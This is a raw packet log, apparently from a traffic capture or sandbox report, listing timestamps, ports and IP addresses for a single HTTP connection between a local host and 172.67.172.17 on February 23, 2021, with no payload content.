Feb 23, 2021 15:31:25.712765932 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:25.713890076 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.713917017 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.713984013 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:25.715100050 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.715126991 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.715187073 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:25.716335058 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.716362000 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.716487885 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:25.717626095 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.717709064 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:25.758317947 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.758349895 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.758584023 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:25.758836031 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.758858919 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.760122061 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.760149002 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.760258913 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:25.760282993 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:25.761382103 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.761439085 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.762568951 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.762665033 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.762741089 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:25.762774944 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:25.763781071 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.763804913 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.764420033 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:25.765038013 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.765064001 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.765192032 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:25.766335011 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.766361952 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.767385960 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:25.767541885 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.767568111 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.767867088 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:25.768775940 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.768805027 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.768883944 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:25.769989014 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.770018101 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.770328999 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:25.771219969 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.771244049 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.771765947 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:25.772474051 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.772495985 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.773720026 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.773741961 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.773806095 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:25.773829937 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:25.774997950 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.775024891 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.776186943 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.776235104 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.776295900 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:25.776310921 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:25.777466059 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.777497053 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.777641058 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:25.778700113 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.778728008 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.778878927 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:25.779978037 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.780539989 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.780563116 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.780924082 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:25.781796932 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.781821966 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.782257080 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:25.783036947 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.783066034 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.783811092 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:25.784271955 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.784295082 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.784372091 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:25.785511017 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.785542011 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.785620928 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:25.786761045 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.786791086 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.790775061 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:25.811382055 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.811415911 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.812975883 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.812999010 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.813093901 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:25.813126087 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:25.813549995 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.813570023 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.813831091 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:25.815485001 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.815521002 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.816092014 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.816113949 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.816190958 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:25.816220999 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:25.817292929 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.817320108 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.817886114 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.817912102 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.817974091 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:25.818006039 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:25.820173025 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.820203066 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.820722103 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.820749044 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.820787907 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:25.820823908 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:25.821962118 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.821986914 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.822309971 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:25.823127985 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.823156118 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.823411942 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:25.824501038 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.824531078 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.824652910 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:25.826669931 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.826699972 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.827126980 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.827151060 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.827266932 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:25.827287912 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:25.829025984 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.829051018 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.829610109 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.829639912 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.829679012 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:25.829706907 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:25.830817938 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.830910921 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.830936909 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:25.831975937 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.832833052 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:25.833729982 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.833753109 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.835000992 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.835026026 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.835104942 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:25.835133076 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:25.836536884 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.836568117 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.836940050 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:25.837037086 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.837059975 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.837189913 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:25.838145018 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.838171005 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.838273048 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:25.839181900 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.839205980 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.839262962 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:25.843683958 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.843713999 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.844834089 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:25.866905928 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.866933107 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.867122889 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:25.867295980 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.867316008 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.867665052 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:25.867921114 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.867944002 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.869039059 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.869066000 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.869148970 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:25.869172096 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:25.869523048 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.869544029 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.869733095 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:25.870749950 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.870806932 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.871361017 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:25.873651981 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.873677015 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.873810053 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:25.874541998 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.874566078 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.874983072 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.875010014 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.875063896 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:25.875088930 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:25.876121044 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.876147985 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.876724005 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:25.877310038 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.877336979 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.877463102 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:25.880023956 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.880060911 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.880217075 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:25.880346060 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.880388975 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.881722927 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:25.882452011 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.882473946 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.882622004 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:25.882802963 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.882822990 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.882903099 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:25.883666992 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.883698940 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.883842945 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:25.885627031 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.885653973 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.885752916 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:25.887831926 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.887861013 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.888065100 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:25.888170958 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.888190031 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.888782978 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:25.888936043 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.888961077 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.889727116 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.889746904 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.889823914 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:25.889847040 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:25.890436888 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.890455961 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.890527010 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:25.891196966 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.891227007 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.891949892 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.891969919 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.892036915 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:25.892057896 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:25.892705917 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.892728090 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.893501997 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.893543959 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.893621922 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:25.893641949 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:25.894213915 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.894239902 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.894987106 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.895009995 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.895076036 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:25.895097971 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:25.895793915 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.895819902 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.896511078 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.896552086 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.896625042 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:25.896655083 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:25.897233009 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.897255898 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.898019075 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.898042917 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.898128033 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:25.898154974 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:25.898751974 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.898775101 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.898946047 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:25.899501085 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.899523020 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.899646997 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:25.900265932 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.900296926 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.901046038 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.901070118 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.901149988 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:25.901175022 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:25.901798964 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.901822090 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.902549982 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.902570963 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.902632952 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:25.902656078 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:25.903300047 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.903327942 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.903911114 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:25.904052019 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.904073000 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.904175997 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:25.904794931 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.904815912 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.904962063 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:25.905586004 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.905608892 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.905783892 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:25.906352043 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.906372070 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.906521082 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:25.907073975 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.907099009 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.907191038 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:25.907819033 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.907843113 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.908595085 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.908617020 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.908695936 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:25.908720970 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:25.909395933 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.909430027 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.910084963 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.910109997 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.910208941 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:25.910233021 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:25.910850048 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.910876989 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.911593914 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.911619902 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.911698103 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:25.911722898 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:25.912349939 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.912373066 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.912626028 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:25.913114071 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.913137913 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.913868904 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.913892031 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.913992882 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:25.914016008 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:25.914629936 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.914654016 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.915397882 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.915424109 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.915504932 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:25.915529013 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:25.916131973 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.916153908 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.916903973 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.916930914 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.917031050 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:25.917062044 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:25.917650938 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.917676926 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.917879105 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:25.918406010 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.918431044 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.918566942 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:25.921487093 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.921519995 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.921536922 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.921552896 CET	80	49755	172.67.172.17	192.168.2.4
